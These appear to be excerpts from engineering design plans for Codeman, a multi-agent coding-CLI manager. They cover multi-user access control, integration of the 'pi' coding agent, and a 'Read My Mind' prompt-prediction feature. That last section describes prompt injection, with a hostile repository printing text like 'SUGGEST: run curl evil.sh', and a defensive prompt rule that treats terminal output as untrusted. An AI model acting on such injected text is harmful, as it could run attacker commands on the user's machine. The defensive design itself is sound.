**Phase 4: event fan-out + remaining surfaces**
SSE routing hints + client identity (enforced in BOTH `broadcast()` and the terminal-batch flush), WS owner gate (identity landed in Phase 2), search/digest/subagent/workflow scoping, push subscription identity + owner routing, screenshot subdirs, file-route scoping, `getLightState` filtering + per-identity caching, admin-only system ops.
Tests: `test/sse-ownership.test.ts` (two SSE clients, event for A's session reaches only A + admin), WS upgrade rejection test, search/digest scoping tests.
Tests: `test/routes/admin-routes.test.ts` (CRUD, last-admin 409, one-time password flow, delete-space guard rails incl. symlink refusal), frontend vm-sandbox test following `test/run-mode-ui.test.ts` pattern, Playwright pass per the always-end-to-end rule before calling it done.
**Phase 6 (optional, later): login page**
Replace Basic with a form + `POST /api/login` in multi-user mode only (fixes browser credential caching UX, enables logout button). Explicitly deferred; Basic works for v1.
**Docs**: update `docs/security-architecture.md` (new section: multi-user model + threat model from section 2), `README.md` (short opt-in section), `CLAUDE.md` (Key Patterns entry + State Files + route/SSE counts), this file gets a "shipped" status stamp per phase.
## 14. Key Risks / Decisions Made
1.**Not a security boundary at the agent layer** (section 2). Decided: ship with loud documentation; Docker cases are the isolation story.
2.**`findSessionOrFail` as the single enforcement point** for ~30 session routes: any route that fetches sessions another way must be audited in Phase 3 (grep for `sessionManager.getSession` outside route-helpers).
3.**SSE sweep is the riskiest surface**: a missed event leaks metadata (not terminal content, which is session-scoped, but names/paths). Phase 4 includes a checklist pass over all ~138 events with the default flipped to "owner-scoped unless explicitly global": fail closed.
4.**Basic-auth password-change UX** is mediocre (browser re-prompt). Accepted for v1; Phase 6 fixes it properly.
5.**Legacy case migration** is manual (admin assigns). No silent moves of user data.
6.**Case-name uniqueness becomes per-user**; tmux session names already include the session id so no collision, but the `w<n>-<case>` tab naming and lifecycle-log rows should include the owner for disambiguation in admin views.
7.**`workingDir` confinement (6.2) is the single most load-bearing rule**: every file-serving and agent-spawning surface downstream trusts `session.workingDir`. Review and test it as carefully as the auth branch (foreign-space path, symlink into a foreign space, `..` traversal, cron fire-time re-check).
8.**The WS handler never sees identity today** (auth happens only in the global hook): the 5.8 wiring is new code on a security-sensitive path; cover unauthenticated, foreign-user, and admin upgrades with tests.
## 15. Open Questions (answer before Phase 3)
1. Should admins' own cases live in `~/codeman-users/<admin>/cases` (symmetric, proposed) or keep using legacy `~/codeman-cases`? Proposed: symmetric; legacy dir is a migration source only.
2. Per-user settings (respawn presets, notification prefs): global-only in v1. Worth a `users/<name>/settings.json` overlay later?
3. Should regular users be allowed to create Docker cases on admin-defined hosts (proposed: yes) or is Docker entirely admin-only?
4. Session handoff: does an admin need "reassign session/case to another user"? (Cheap to add next to `cases/assign`; not in v1 scope.)
5. Permission-mode grants (section 6.3): one `canBypassPermissions` flag covering Claude/Codex/Gemini bypass equivalents PLUS shell mode and cron `launchCommand` (proposed: one flag, keep it one-bit), or split into `canBypassPermissions` + `canRunArbitraryCommands`? And should admins be able to set a per-user DEFAULT mode (for example force `normal` for an intern) rather than just gating bypass?
6. OpenCode has no single bypass flag (its permission config rides `OPENCODE_CONFIG_CONTENT`): decide what the grant means there before Phase 3, or exclude OpenCode mode for non-granted users in v1.
| npm package | `@earendil-works/pi-coding-agent`, latest **0.84.1** (2026-08-07; 0.84.0 was 2026-08-06); `legacy-node20` dist-tag at 0.74.2 |
| Install | `npm install -g --ignore-scripts @earendil-works/pi-coding-agent`, or `curl -fsSL https://pi.dev/install.sh \| sh` (the curl installer also goes through global npm, so both uninstall via npm) |
| Config dir | `~/.pi/agent` (override: `PI_CODING_AGENT_DIR`). Holds `auth.json`, `trust.json`, `settings.json`, `models.json` (user-defined providers), `models-store.json` (cached catalogs), `keybindings.json`, `extensions/`, `skills/`, `prompts/`, `themes/`, `AGENTS.md`, `SYSTEM.md`, and the package trees `npm/` + `git/` |
| Sessions | `~/.pi/agent/sessions/--<cwd with / replaced by ->--/<timestamp>_<uuid>.jsonl`, tree-structured (`id`/`parentId`), format v3. Overrides: `PI_CODING_AGENT_SESSION_DIR`, `--session-dir` |
| Credentials | `~/.pi/agent/auth.json` (OAuth subscriptions + API keys, auto-refresh), plus ~34 provider env vars with **no common prefix**. 0.84.1 adds `pi auth check` (auth preflight with optional credential output) |
| TUI | Default: **main screen with terminal-owned scrollback**. Since **0.84.0** an experimental fullscreen mode exists, selectable via `--tui-mode fullscreen`**or at runtime through `/settings`**; the default remains the main-screen mode |
| Providers | 15+ (Anthropic, OpenAI, Google, Azure, Bedrock, Mistral, Groq, xAI, OpenRouter, Copilot, Baseten since 0.84.0, ...). OAuth subscription login via `/login` for six: ChatGPT Plus/Pro, Claude Pro/Max, GitHub Copilot, xAI, OpenRouter, Radius |
| Permission model | **No permission prompts at all.** No built-in sandbox, no MCP (none planned), no sub-agents, no plan mode, no to-dos, no background bash. Tools run with the user's own permissions |
| Trust model | "Project trust" gates **loading** of project-local `.pi/` config/extensions/skills and **installing missing project packages**, not tool execution. Triggered only when the cwd (or an ancestor) contains `.pi/settings.json`, `.pi/extensions\|skills\|prompts\|themes`, `.pi/SYSTEM.md`/`.pi/APPEND_SYSTEM.md`, or `.agents/skills`; a bare `.pi/` directory does NOT prompt. Global `defaultProjectTrust`: `ask` (default) / `always` / `never` |
Three consequences shape the whole integration:
1.**There is no `--dangerously-skip-permissions` analog and none is needed.** Pi never prompts for
tool approval. The Claude/Codex/Gemini/Antigravity pattern of "send the bypass flag so the session
is not stuck on a modal" does not apply. Codeman must not invent a flag here.
2.**The one privileged knob is `--approve` / `-a`** (trust project-local files for this run), which
makes pi load and execute project `.pi/extensions` TypeScript **and run an npm install of missing
project packages**. That is the field the multi-user clamp has to cover. Its explicit inverse
`-na` / `--no-approve` exists, which lets the clamp force-deny rather than merely omit (§3, §5.2).
3.**Provider keys cannot ride the env allowlist.** Pi's provider key vars (`ANTHROPIC_API_KEY`,
`OPENAI_API_KEY`, `DEEPSEEK_API_KEY`, `HF_TOKEN`, `BASETEN_API_KEY`, ...) share no prefix, so
there is no way to admit them through `ALLOWED_ENV_PREFIXES` without widening the list for every
mode (§2.4).
---
## 2. Design decisions
### 2.1 Mode identity
`SessionMode` gains `'pi'`. Not a location overlay (unlike Docker/remote-SSH cases), not a web tab:
a real sixth CLI backend with its own PTY, tmux session and respawn behaviour, exactly like
`antigravity`. Append `pi` after `antigravity` in every enum/list to keep ordering consistent.
| Tab badge | `pi` (two-letter lowercase, like `sh`/`oc`/`cx`/`gm`/`ag`) |
| Run button label | `Run PI` (short-label ternary in `_applyRunMode`, pattern `Run AG`) |
| Kill-menu label | `Kill Tmux & Pi` |
| Identity color | **`#f472b6` (rose-400)**. Verified free: live computed values on the default skin are claude `#38b6f0`, opencode `#44b993`, codex `#2b8fd9`, gemini `#8ab4f8`, antigravity `#22d3ee`, shell `#98a2b1`, web `#38bdf8`; purple is codex's base hex and amber reads as the shell tab badge, so pink/rose (or orange `#fb923c`) are the only genuinely free hues. No `pi` CSS identifier collides anywhere (`mode-pi`, `.tab-mode.pi`, `.run-mode-dot.pi` all grep clean, re-checked at f39beb3) |
| Env prefix | `PI_` |
| Dependency id | `pi` |
| Status endpoint | `GET /api/pi/status` |
### 2.2 `isExternalCliMode()` yes, `isAltScreenStripMode()` no
Pi joins `isExternalCliMode()` (`session.ts:164-167`): its own TUI, its own output format, so the
Ralph tracker, `BashToolParser`, token/CLI-info scraping and the `❯` readiness probe all stay off
(gates at `session.ts:1100`, `:1701`, `:2000`, `:2103`), and readiness falls back to the output
stabilization used by the other external CLIs.
Pi stays **out** of `isAltScreenStripMode()` (`session.ts:197-199`, currently codex/claude/gemini;
antigravity and opencode are deliberately excluded). Pi's default TUI renders into the main screen
with terminal-owned scrollback, so there is nothing to strip. The fullscreen mode **shipped in
0.84.0 and is runtime-switchable via `/settings`**, so Codeman cannot assume a pi session stays
main-screen for its lifetime; staying out of the strip list is exactly what makes that safe (the alt
screen is load-bearing when the user flips to fullscreen, as it is for `opencode`). Putting pi IN
the strip list would corrupt fullscreen sessions. Three mirrors must stay consistent (all unchanged
for pi, i.e. pi appears in none of them): the replay-side strip in `session-routes.ts:2275`, the
live-stream twin in `session.ts`, and the frontend `_sessionUsesServerMouseStrip()` in
`terminal-ui.js` (usages `:3432`, `:3697`).
### 2.3 tmux required, no direct-PTY fallback, no per-mode configurator
Same rule as the other external CLIs: `pi` mode throws if tmux is unavailable. Add a fourth block to
the guard chain at `session.ts:1751-1768` (antigravity's is `:1765-1768`).
**No `_configurePi()` is needed.** Opencode/codex/gemini each have a tmux-`setenv` configurator
(`tmux-manager.ts:1709-1727`), but antigravity has none: it relies entirely on the generic
`applyEnvOverrides()` (`tmux-manager.ts:1643`, `VALID_KEY = /^[A-Z_][A-Z0-9_]*$/`), which runs for
every mode in both create (`:1880`) and respawn (`:2107`) and injects via socket-scoped
`tmux setenv`, never the spawn command line. Pi follows the antigravity precedent: `PI_*` overrides
flow through `applyEnvOverrides()` and nothing else.
Pi joins the truecolor branches: `buildEnvExports()` (`tmux-manager.ts:1604-1609`,
`export COLORTERM=truecolor` + `unset NO_COLOR` for codex/gemini/antigravity) and the attach-env
condition at `session.ts:1400-1402` (`buildMuxAttachEnv(...)`, whose comment says it must mirror
`buildEnvExports`). Add `|| mode === 'pi'` to both, or the tmux session and the attach client
disagree about color depth.
### 2.4 Env prefix: `PI_` only
Add `'PI_'` to `ALLOWED_ENV_PREFIXES` (`schemas.ts:125`) and to the prose error message at `:163`
(two edits: the message hardcodes the list, and since 1.12+ it also names the exact-key allowlist,
currently `...ANTIGRAVITY_* keys and CLAUDE_CONFIG_DIR are allowed.`; there is now a separate
`ALLOWED_ENV_KEYS` exact-key set alongside the prefix list, which pi does not need to touch). That
covers every documented variable pi reads: `PI_CODING_AGENT_DIR`, `PI_CODING_AGENT_SESSION_DIR`,
| `src/utils/index.ts` | Re-export the three (resolver block `:30-36`) |
| `src/types/session.ts` | `SessionMode` union `:46`; **both `Extract` lists**: `RemoteCommandMode``:48-51`, `DockerCommandMode``:157-161` (§2.8); new `PiConfig` after `AntigravityConfig` (`:325-333`); `SessionState.piConfig` after `:486`; `@fileoverview` mode list `:11` + config list `:17` |
| `src/mux-interface.ts` | `piConfig?: PiConfig` on `CreateSessionOptions` (config block ends `:78`) and `RespawnPaneOptions` (ends `:109`) |
| `src/session.ts` | `isExternalCliMode()``:164-167` (+pi); `getModeLabel()``:168-183` (+`'Pi'`); `_piConfig` field decl `:466-470`; ctor option `:556-563` + apply `:652-654`; `toState()``:1227-1230`; `_buildRespawnPaneOptions()``:1466-1469` (single source of truth shared by `startInteractive` and `reattachRemote`); `startInteractive()` createSessionOptions `:1680-1683`; COLORTERM attach-env condition `:1400-1402` (+pi); requires-tmux guard chain `:1751-1768` (new block: "Pi sessions require tmux for env override injection via setenv") |
| `src/tmux-manager.ts` | `buildPiCommand()` after `:736` per §3; `buildSpawnCommand()` signature `:770-779` + dispatch branch after `:822-825`; `appendResumeFlag()``:1030-1042` (`case 'pi': return \`${modeCommand} --session ${resumeId}\`;`); `buildEnvExports()` truecolor branches `:1604-1609` (+pi); `buildPathExport()` `:1680-1707` (+pi branch calling `resolvePiDir()`); missing-CLI error chain in `createSession` `:1788-1806` (+pi, install hint `npm install -g --ignore-scripts @earendil-works/pi-coding-agent`; note `respawnPane` deliberately has no such check); `piConfig` threading at the four sites `:1748`, `:1817`, `:2041`, `:2080`. **No `_configurePi`** (§2.3) |
| `src/docker-hosts.ts` | `defaultDockerCommandForMode` `:138-149`: `pi: 'exec pi'`. `CRED_STORES` `:597-605`: the `.pi/agent` seedFiles entry per §2.5 (nested `rel` already handled at `:613-645`). File unchanged since 2026-08-06 |
| `src/remote-hosts.ts` | `defaultRemoteCommandForMode` `:92-118`: `pi: remoteLoginShellCommand('pi')` (`remoteLoginShellCommand` at `:88-90`). Login-shell routing is mandatory (the #209/e803186 lesson: ssh remote-command exec sees only sshd's minimal PATH, and npm's global bin is usually only on PATH via rc files) |
| `src/web/schemas.ts` | `'PI_'` in `ALLOWED_ENV_PREFIXES` `:125` **and** the prose error message `:163` (which now also names `CLAUDE_CONFIG_DIR`; the `ALLOWED_ENV_KEYS` exact-key set needs no change); new `PiConfigSchema` after `AntigravityConfigSchema` (`:256-271`), mirroring §3's regexes, `.optional()`, not `.strict()`; `piConfig` on `CreateSessionSchema` (`:299` area) and `QuickStartSchema` (`:712` area); `'pi'` in all three mode enums (`:285`, `:708`, cron `agentType` `:1214`; they are byte-identical and there is no fourth); `pi` key in `RemoteCommandOverridesSchema` `:426-436` (it is `.strict()`, so an unknown key is a hard error today; one edit covers both remote `:501` and docker `:577` reuse) |
| `src/web/routes/session-routes.ts` | Thread `piConfig` through create (`POST /api/sessions`): disk-strip exclusion chain `:705-712`, availability gate `:782-790` (+`isPiAvailable` with install-hint error), model resolution `:825-838` (`mode === 'pi' ? body.piConfig?.model : ...`), clamp call `:845`, Session ctor `:860` (`piConfig: mode === 'pi' ? gatedPiConfig : undefined`). Quick-start (`POST /api/quick-start`, handler `:2559`): remote-case config rejection `:2614-2621` and docker-case `:2645-2652` (+`piConfig`: per-CLI config does not cross ssh or the bind mount), hooks-scaffold exclusions `:2801`/`:2809`, availability gate `:2744-2752` (local-case branch only), env-strip chains `:2833`/`:2863`, model resolution `:2885`, clamp `:2897`, ctor `:2913`. **Extend `clampExternalCliBypassForOwner()`** (`:305-336`, doc comment above): fifth param + return field; pi joins the **materialize** branch per §5.2. Alt-screen replay-strip at `:2275` unchanged (pi not in it, §2.2) |
| `src/web/routes/system-routes.ts` | `GET /api/pi/status` after the antigravity handler (`:418-426`; file unchanged since 2026-08-06), same shape plus `version` (§2.6); update the "CLI Integrations" prose comment `:377` |
| `src/web/server.ts` | Restore path: `piConfig: muxSession.mode === 'pi' ? savedState?.piConfig : undefined` after `:2636`. **`renderIndexHtml` CLI-availability injection `:1375-1407`**: add `isPiAvailable` to the dynamic-import tuple (`:1382`) and a `pi` key to the injected object (`:1399`). Per §2.8 a missing key reads as *available*, so this is a correctness edit, not polish |
### Phase 3: Frontend
The antigravity touchpoints are the template. Since the first draft, the settings-surface overhaul
moved most anchors and added one **new touchpoint** (the clone-repo Brain picker below).
`constants.js`, `api-client.js`, `ralph-wizard.js`, `cron-ui.js`, `webview-tabs.js` and `sw.js`
still need **no** changes (re-verified zero mode coupling at f39beb3; cron-ui reads the `<select>`
| `index.html` | Welcome button `welcomePiBtn` after Gemini's (antigravity's is `:347`; there is deliberately no codex welcome button), `display:none` default, `onclick="app.setRunMode('pi'); app.runPi()"`, text `Run Pi`; run-mode-option row with `.run-mode-dot.pi` after antigravity's (`:526-528`), before the `.run-mode-sep` `:529`; cron `<option value="pi">Pi</option>` after `:803`; **NEW: the clone-repo "Brain" picker** (`cloneCaseBrain`, `:2476-2486`): add `<option value="pi" data-cli="pi">Pi</option>` after the antigravity option `:2483` (gating is automatic: session-ui.js `:2107-2115` hides options whose `data-cli` fails `isCliAvailable`, and `:2250` reads the value at clone time); docker image hint `:2624` (`claude/codex/gemini/opencode/agy` + pi). No per-CLI remote-command override field needed (only codex has one, `:2559`) |
| `session-ui.js` | `@fileoverview` mode list `:2`; `run()` dispatch branch after `:400-402`; `_refreshRunModeAvailability` list `:468` (+`'pi'` as a quoted literal, the static test in §6 demands it); short-label ternary `:565` (+`'Run PI'`); **the `runMode` setter whitelist `:2949-2960`** (§2.8, the deceptive one); new `runPi()` modeled on `runAntigravity()` `:1170-1219`: same remote/docker skip, same `_beginSessionLaunchStatus` frame, probes `/api/pi/status` reading `(await res.json()).data.available` (envelope!), **sends no `piConfig` at all** (no bypass exists and trust defaults are pi's own; envOverrides still sent for local cases), install-hint error text matching Phase 1's; `isAltMode` `:1233` and `isExternalCli` `:1263` four-way comparisons (+pi) |
| `panels-ui.js` | Command-palette `labels` map `:430` (+`pi: 'Pi'`; the `\|\| mode` fallback means this is cosmetic, not load-bearing) |
| `mobile-overview.js`| `MOBILE_OVERVIEW_RUN_MODES` `:55-62`: `{ mode: 'pi', label: 'Pi', short: 'Pi' }` after antigravity `:60`, before the shell entry. Nothing else: the Run-button badge (`:499`) and menu builder (`:554-556`) consume the list generically, and the buttons carry `btn-toolbar btn-run mode-pi`, which is exactly why they inherit the §2.9 cascade problem and its fix |
| `terminal-ui.js` | Badge-row comment `:1750` only (the badge itself is a raw `s.mode` passthrough, no list to extend). `_sessionUsesServerMouseStrip` unchanged (§2.2). `_updateLocalEchoState` unchanged for v1 (§2.10: pi lands on `'buffer'` via the fallthrough; only touch it if E2E forces the `'off'` fallback) |
| `i18n.js` | `'Run Pi': '运行 Pi'` in the zh-CN table (`:102-107`, matches the welcome-button text; short labels like `Run PI` are deliberately untranslated, as are the other modes') |
| `styles.css` | Tab badge `.session-tab .tab-mode.pi` after `:2157` (`background: rgba(244,114,182,0.2); color: #f472b6;`); add `.session-tab .tab-mode.pi` to the light-skin ink list `:325-336` (gemini + antigravity are its precedent, `:332`); welcome `.welcome-btn-pi` + `:hover` after antigravity's `:3366` block, rose family (e.g. base `linear-gradient(135deg, #33121f 0%, #9d174d 55%, #be185d 100%)`, border `rgba(244,114,182,0.4)`, text `#fce7f3`); toolbar gradient pair `.btn-toolbar.btn-run.mode-pi, .btn-toolbar.btn-run-gear.mode-pi` + `:hover` after `:4420`'s antigravity block; `.run-mode-dot.pi { background: #f472b6; }` in the dot list `:4506-4516`; **and the §2.9 rule inside the Daylight block** next to codex's `:13787` (e.g. `background: linear-gradient(135deg, #be185d, #f472b6); border-color: #be185d; color: #fff1f7;`). The dot needs no skin-block entry (the block overrides only claude/opencode/codex/shell dots; gemini/antigravity dots already fall through correctly) |
| `mobile.css` | Phone toolbar block after `:910` inside the `@media (max-width: 430px)` opened at `:338`: `mode-pi` base + `:active`, **with `!important` on background/border-color/color** (§2.9; antigravity's block `:895-910` omits it and is dead); light-skin override entry after `:2985` with the same four-skin `html:is(...)` prefix as its siblings |
### Phase 4: Docker image and installer
Both files are unchanged since the 2026-08-06 verification; all anchors stand.
- `docker/agent.Dockerfile`: a **separate** `RUN` step after the antigravity block (`:38-45`), not a
fifth line in the shared npm block (`:31-36`), because pi documents `--ignore-scripts` and that
flag must not silently change how the other four install:
```dockerfile
# Pi (pi.dev). Upstream documents --ignore-scripts (pi needs no lifecycle scripts);
# kept out of the shared npm block above so the flag cannot affect the other CLIs.
RUN npm install -g --ignore-scripts @earendil-works/pi-coding-agent \
&& npm cache clean --force \
&& pi --version
```
Implementation checklist item: the gid-0 pre-created dirs at `:64-68` include `.claude/projects`
and `.codex/sessions`; verify whether the cred-seed copy into `~/.pi/agent` creates its target
dir in a fresh container or whether `.pi/agent` must join that `mkdir` line. Rebuild with
`node scripts/build-agent-image.mjs --no-cache` (the script itself needs no change; nothing in it
is CLI-specific). The cached npm layer has silently frozen a CLI at a broken version before; see
`docs/docker-cases.md`.
- `install.sh` (six edit sites, all verified): `PI_SEARCH_PATHS` block after `:125` (mirror the
| `pi` resolves to an unrelated binary | `pi --version` + semver-shape check in the resolver (§2.6); path and version shown in `/api/pi/status` |
| Pi's TUI repaints in a way the browser terminal handles badly | Test scrollback and repaint early (step 3 of §7); pi's default is main-screen with terminal-owned scrollback, which is the friendly case |
| Fullscreen TUI mode (shipped 0.84.0, runtime-switchable) | Already designed for: pi stays OUT of the strip list, so a user flipping `/settings` to fullscreen gets opencode-like alt-screen behavior, not corruption. §7 step 7 tests the flip explicitly |
| The buffer local-echo overlay fights pi's live composer | §2.10: explicit E2E gate (§7 step 4) with the one-line `'off'` fallback; predictive echo for pi is a tracked follow-up, not a v1 blocker |
| Pi moves fast (pre-1.0; 9 releases in the 7 weeks before 0.84.1) | Keep the flag surface small; every flag validated and droppable; nothing pinned in the Dockerfile beyond the `--no-cache` rebuild cadence. Live example of the hazard: `--tui-mode` went from main-only docs to released between the two drafts of this plan |
| Docker image grows | Pi is an npm package; the layer is modest next to the ~190MB `agy` binary |
| Trust prompt blocks a session | Narrower than feared: only fires when `.pi/settings.json`, `.pi/extensions\|skills\|prompts\|themes`, `.pi/SYSTEM.md`/`APPEND_SYSTEM.md` or `.agents/skills` exists (bare `.pi/` does not). Documented; `approveProjectTrust` is the opt-in escape hatch; multi-user forces `--no-approve` (§5.2); the `project_trust` extension follow-up removes the prompt entirely |
| Provider auth is awkward without key prefixes in the allowlist | `/login` writes `~/.pi/agent/auth.json` once and Docker seeds it; the mode-aware allowlist follow-up removes the friction |
| Cron pi jobs mis-detect readiness | Known degradation, documented in §6; readiness falls through after the poll budget and the prompt still sends |
| Composer signature | Cursor row starts `"› "` (U+203A + space), text begins col 2. Present when empty (placeholder), while typing, and while the slash picker filters. `CODEX_COMPOSER_ROW_RE = /^› /` |
| Composer text color | Plain default foreground, zero SGR around echoed chars. Span `foregroundColor` default (theme fg) is an exact match |
| Placeholder | Cycling hint text ("Use /skills...", "Improve documentation in @filename", ...) rendered AT the cursor cell. First prediction lands over placeholder glyphs: covered by the snapshot + cursor-advance rules |
| Wrap | Word-wrap near `cols - 2`; continuation rows are indented 2 spaces WITHOUT `› `. The gate therefore suppresses predictions on wrapped lines: deliberate fallback to real echo, wrap was the #220 ghost zone. `edgeMarginCells = 4` |
| Modal (trust dialog) | Cursor parks on `" Press enter to continue"`: no `› ` prefix, gate false, zero predictions painted while keystrokes still reach the PTY (the ghost eliminator) |
| Streaming | Error/reconnect bursts render above a re-rendered composer that keeps the `› ` signature; end-of-frame cursor parks at the insertion point (col 2 of the composer row). Confirms the cursor-advance confirm rule and the no-drop-on-baseY rule |
| Echo shape under tmux | tmux emits minimal deltas for simple echoes and full repaints for busy frames; both converge in the parsed buffer |
| Slash picker | Picker rows render below; the cursor row keeps the composer signature and advances per filter char, so predictions stay active while filtering (#222 surface) |
Constants decided at the Phase 0 gate: `CODEX_COMPOSER_ROW_RE = /^› /`,
A 🧠 button that predicts the prompt you were about to type. Codeman keeps a per-case **intent profile** (your stated goals plus the real prompts you recently sent), feeds it and the live pane tail to a one-shot `claude -p`, and shows the predicted next prompt in a plan-mode-style approval dialog: **Send** / **Rethink** (with an optional steer note) / **Insert** (drop it on the composer to edit) / **Dismiss**. It is also a skill surface: the agent can read the intent profile, record intentions, and request a prediction over the HTTP API. Suggestions are **never auto-sent**; the human click is the boundary.
## UX flow
1. User hits 🧠 (desktop header button; phone: keyboard-accessory key).
2. Modal opens with a spinner, then the top suggestion in an editable single-line field, rationale below it, up to 2 alternates as tappable rows.
3. Buttons: **Send** (submits with `\r`), **Insert** (sends without `\r`, so the text sits unsubmitted on the CLI composer for editing, a documented mechanism), **Rethink** (optional free-text steer, e.g. "no, I meant the mobile bug", re-runs with the rejected suggestions included), **Dismiss**.
4. Accepted prompts flow back into the intent history like any other sent prompt, so the profile self-corrects.
## Scope (v1)
- Claude mode only (capture rides Claude transcripts; external CLIs have no transcript watcher). Mirrors the approvals-inbox scoping.
- Opt-in: `readMyMindEnabled`, synced, default **OFF**. While OFF: no capture, no UI surfaces. Privacy first, and every press costs real tokens.
- One prediction in flight per session; the button disables while checking.
- Sync request/response (the predictor takes 5-30s; agent-wait long-polls already hold requests longer). No new SSE events in v1.
## Data model
Per case, not per session: intentions outlive `/clear` and respawns.
recentPrompts:{ts: number;sessionId: string;text: string}[];// FIFO cap 50, each ≤ 500 chars
}
```
Storage: `dataPath('intents.json')`, written mode 0600 (prompts can contain secrets; same posture as `users.json`). Never enters the `/api/search` index. Add to the CLAUDE.md State Files list.
## Intent capture
**Source: the session transcript, not the input paths.**`POST /api/sessions/:id/input` sees only programmatic input, and the WS channel delivers raw keystrokes (`session.write(msg.d)`), so neither yields clean submitted prompts. Claude's own JSONL transcript records every user turn as structured text, and `transcript-watcher.ts` already tails it. Add a `userPrompt` event there:
- Emit for `type: 'user'` entries whose content is a string or contains a text block; skip entries that are only `tool_result` blocks (tool results are wrapped as user messages).
- Skip texts < 3 chars (menu digits, Esc artifacts), truncate to 500, drop consecutive duplicates ("continue" spam from auto-resume stays but dedupes).
`IntentStore` (new `src/intent-store.ts`, pure core + IO wrapper, in the style of `session-order.ts`) subscribes via session wiring, gated on the setting resolved from **merged** settings per the partial-PUT rule.
## Context assembly (how the mind reading actually works)
The quality of the suggestion is decided before the model ever runs, by what we put in front of it. A new pure function `buildPredictionContext()` (in `src/readmymind-context.ts`, unit-testable with fixtures, no IO of its own; collectors inject their data) assembles a budgeted, priority-ordered prompt from every signal Codeman already has:
| # | Source | What it contributes | Cap |
| - | ------ | ------------------- | --- |
| 1 | **Pending dialog** (approvals-inbox store, when present) | If the session is sitting on an AskUserQuestion / permission / idle prompt, the honest "next prompt" is an *answer*. The dialog text + parsed options go in first and the model is told to answer it. | 2 KB |
| 2 | **User goals** (`goals` from the intent profile) | The only fully-trusted statement of what the user wants. Highest authority in the trust ranking below. | 8 KB |
| 3 | **Last assistant turn** (transcript, not the pane) | Assistant replies usually *end* with the fork in the road ("Want me to X?", "Next steps: ..."), so keep the **tail** when truncating. The transcript has the full message; the pane is a repaint window full of spinner junk. | 6 KB |
| 4 | **Recent user prompts** (intent profile, with timestamps) | The conversation rhythm AND the user's prompting voice: length, tone, shorthand (`COM`, lowercase, typos and all). The model is instructed to write suggestions in *this* style, not assistant-ese. | last 20 |
| 5 | **Recent tool activity** (transcript `tool_use` blocks, already parsed by `TranscriptWatcher`) | One line per call: `Edit src/foo.ts`, `Bash npm test (failed)`. What the agent actually *did*, which the last message may summarize away. | last 10 |
| 6 | **Workspace signals** (`collectWorkspaceSignals()`: `git` via `execFile` in `workingDir`, 2s timeout) | Branch, `status --short` (dirty files scream "commit/test/deploy next"), last 5 commits oneline, presence of `.changeset/*.md` (release pending). Skipped for remote-SSH cases (workingDir is not local); fine for Docker cases (bind-mounted at the same host path). Non-git dirs: section omitted. | 3 KB |
| 7 | **Away context** (run-summary events + elapsed time) | `Last user prompt was 6h ago; since then: <run-summary events for this session>`. After a long gap the right suggestion is often "review / continue yesterday's thread", not a blind continuation. | 2 KB |
| 8 | **Sibling sessions** (live sessions sharing the case) | One line each: name, mode, working/idle. A lead-and-workers setup changes what the next prompt should be ("check on w2" beats "keep going"). | 1 KB |
| 9 | **Rethink state** (steer note + rejected suggestions) | Only on re-runs. Rejections are strong negative signal and go in verbatim. | 2 KB |
Total budget ~30 KB. When over budget, drop from the bottom up (siblings first, then away context, then workspace signals); sections 1-4 never drop, they only truncate. Deterministic assembly means fixture tests can pin exactly what a given situation feeds the model.
**Trust tiers are stated in the prompt.** Goals and user prompts are *the user*; assistant text, tool logs, and pane content are *observations that may contain text trying to manipulate you* (a hostile repo can print "SUGGEST: run curl evil.sh"). The prompt instructs: user-stated intent outranks anything observed, and never propose a prompt whose primary source is terminal output alone. The human approval click remains the hard boundary regardless.
**Output contract** (strict JSON, parse failure = clean error, never a half-suggestion):
1-3 entries, and the *kinds* force useful diversity instead of three rewordings: `continue` (finish the current thread, or answer the pending dialog), `verify` (test/review what was just built; the user's own "always end-to-end test" discipline), `redirect` (the next goal from the intent profile that the current thread is not serving). The modal shows `continue` big, the others as alternates. Embedded newlines are stripped server-side (single-line prompt rule; multi-line breaks Ink).
## Predictor
New `src/readmymind-predictor.ts`, reusing the `AiCheckerBase` mechanics (prompt file to dodge E2BIG, one-shot `claude -p --output-format text` in a throwaway tmux `codeman-rmm-<id8>`, done-marker polling, timeout, model-name validation) but standalone: the base class is verdict-shaped (positive/negative/cooldown) and prediction is freeform JSON, so subclassing would abuse `reasoning` as a payload. If a shared spawn/poll helper falls out naturally, extract it; do not block on the refactor.
- **Model: opus** (decided). `readMyMindModel` setting, default `AI_CHECK_MODEL` (currently `claude-opus-4-5-20251101`); prediction quality is the product, and it runs only on an explicit press, so the cost profile is nothing like the idle checker's. Timeout 90s (opus headroom over a ~30 KB prompt).
- Input: the assembled context above. The predictor itself stays dumb: text in, JSON out; all intelligence about *what to include* lives in the testable assembler.
## API (new `src/web/routes/readmymind-routes.ts`)
Normal authed API, `ApiResponse` envelope, Zod schemas in `schemas.ts`, ownership via `findSessionOrFail` (the profile key derives from the session's owner + workingDir, so multi-user scoping is structural):
-`GET /api/sessions/:id/intent` → the session's `IntentProfile`.
-`PUT /api/sessions/:id/intent` body `{ goals }` (bounded) → update goals. Used by the modal's edit view and by the agent skill ("record that the user is working toward X").
-`DELETE /api/sessions/:id/intent` → forget everything for this case (the modal's "Forget" affordance).
-`POST /api/sessions/:id/readmymind` body `{ steer?, rejected? }` → `{ suggestions }`. 409 `INVALID_STATE` while a prediction is already running for the session; claude-mode sessions only (400 otherwise, mirroring wait-signal gating).
## Frontend
New module `readmymind-ui.js` (@loadorder 11.3, after panels-ui.js), prettier-formatted.
- **Desktop**: header button `btn-readmymind`, default-hidden via marker class `btn-readmymind--hidden` (the `!important` display rules require the marker-class pattern), shown by `applyHeaderVisibilitySettings()` when the setting is ON. Off phones per `test/mobile-header-buttons-policy.test.ts`.
- **Phone**: a 🧠 key on the keyboard accessory bar (that bar is where input helpers live, and phones are where typing hurts most). Opens the same modal. Modal z-index respects the ≤768px layer rules (1300+).
- **Send** goes server-side: `POST /api/sessions/:id/input` with `\r` appended. Deliberately NOT the browser keystroke path, so the `sendEnterKey` / local-echo-overlay trap never applies (the modal is UI chrome, not terminal typing). **Insert** is the same POST without `\r`.
- i18n strings registered (en + zh-CN); suggestion text itself carries `data-i18n-skip`.
## Skill integration
The user-facing promise: the button is also a skill. Extend `skills/codeman`:
- New section "Read My Mind: intent + prediction" with the three intent verbs (read profile, append/replace goals, predict) and the guard notes (single-line prompts, never auto-send to another session without the user asking).
- Update `reference/endpoints.md` (the endpoints.md drift test pins this).
- The auto-injected case copy heals via the existing marker-owned `applyAgentSkill` mechanism; nothing new needed there.
